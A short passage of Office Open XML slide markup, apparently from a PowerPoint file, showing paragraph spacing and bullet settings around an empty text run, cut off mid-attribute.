              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="16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